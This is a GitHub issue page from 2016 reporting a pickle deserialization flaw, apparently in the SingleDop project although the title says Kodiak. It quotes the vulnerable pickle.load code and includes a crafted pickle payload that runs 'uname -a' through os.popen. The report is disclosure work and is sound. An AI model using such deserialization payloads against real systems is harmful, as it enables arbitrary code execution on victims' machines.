Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remote code execution in Kodiak #5

CR1AT0RS opened this issue Dec 1, 2016 · 0 comments

Remote code execution in Kodiak #5

CR1AT0RS opened this issue Dec 1, 2016 · 0 comments


Copy link

@CR1AT0RS CR1AT0RS commented Dec 1, 2016


Showing the top six matches. Last indexed on Sep 17.

1849 import pickle
1851 in_f = open(filename,"rb")
1853 tabversion = pickle.load(in_f)
1854 if tabversion != tabversion:

1855 raise VersionError("yacc table file version is out of date")
1856 self.lr_method = pickle.load(in_f)
1857 signature = pickle.load(in_f)
1858 self.lr_action = pickle.load(in_f) `

I would like to report a remote code execution potential vulnerability in Singledop. Pickle module enables binary serialization and loading of Python datatypes and any user supplied sample file can lead to remote code execution on any researches machine processing a serialized file.

screen shot 2016-11-30 at 3 53 07 pm

Attack binary a valid dop file:

mona@mona-virtual-machine:~/Downloads/SingleDop$ cat t_file cos popen (S'uname -a' tRp100 0c__builtin__ getattr (c__builtin__ file S'read' tRp101 0c__builtin__ apply (g101 (g100 I1000 ltRp102 0c__builtin__ getattr (c__builtin__ file S'close' tRp103 0c__builtin__ apply (g103 (g100 ltRp104 0g102 .
The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Please let me know if you have any questions. You can also reach back to me at

@cesaramh cesaramh closed this Oct 16, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
2 participants